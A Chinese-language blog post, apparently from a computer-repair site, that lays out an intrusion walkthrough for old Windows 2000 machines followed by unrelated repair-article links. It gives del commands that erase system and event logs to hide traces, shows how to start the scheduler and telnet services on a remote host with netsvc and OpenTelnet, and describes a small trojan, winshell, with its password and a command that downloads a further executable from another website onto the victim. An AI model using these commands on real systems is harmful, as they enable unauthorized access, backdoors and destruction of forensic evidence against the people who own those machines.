扫尾:
del C:/winnt/system32/logfiles/*.*
del C:/winnt/ssytem32/config/*.evt
del C:/winnt/system32/dtclog/*.*
del C:/winnt/system32/*.log
del C:/winnt/system32/*.txt
del C:/winnt/*.txt
del C:/winnt/*.log
一、netsvc.exe
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
netsvc /list //IP地址
netsvc schedule //IP地址 /query
netsvc //IP地址 schedule /start
二、OpenTelnet.exe
远程启动主机的Telnet服务,并绑定端口到7878,例如:
OpenTelnet //IP地址 用户名 密码 1 7878
然后就可以telnet到主机的7878端口,进入DOS方式下:
telnet IP地址 7878
三、winshell.exe
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD后,可打下面的命令:
p Path (查看winshell主程序的路径信息)
b reBoot (重新启动机器)
d shutDown (关闭机器)
s Shell (执行后你就会看到可爱的“C:/”)
x eXit (退出本次登录会话,此命令并不终止winshell的运行)
CMD http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
本文发布于2012年12月29日12:20
,已经过了4506天,若内容或图片失效,请留言反馈
转载请注明出处: 网际网
本文的链接地址: https://www.wjdiy.com/ruanjing/345.html
-
怎么更改门禁密码 修改门禁密码步骤有几种?
2019/11/23
-
笔记本电脑开不了机维修一下多少钱?
2016/12/22
-
开机报错2102:Detection error on SSD2(m.2)解决方法
2016/05/23
-
民治电脑维修中心
一、计算機维护(各种操作系统 、软件调试安装、重要文件备份、计算機病毒防治等有关计算機所有问题)
二、網絡维护(各种網絡故障检测与排除、網絡设备及服务器维护等有关網絡方面的问题)
三、综合布线(对各类类型无线、宽带、专线进行综合布线,使之完成網絡办公所需要求)
2012/11/21
-
启动修复正在检查系统问题,开机提示修复系统
今天开機
好久没打开!后来一下!桌面上出现“启动修复正在检查系统问题”
如图:
开機提示修复系统花了1小时!后来自己又可以了!这是w7系统修复
2012/12/30
-
暂无评论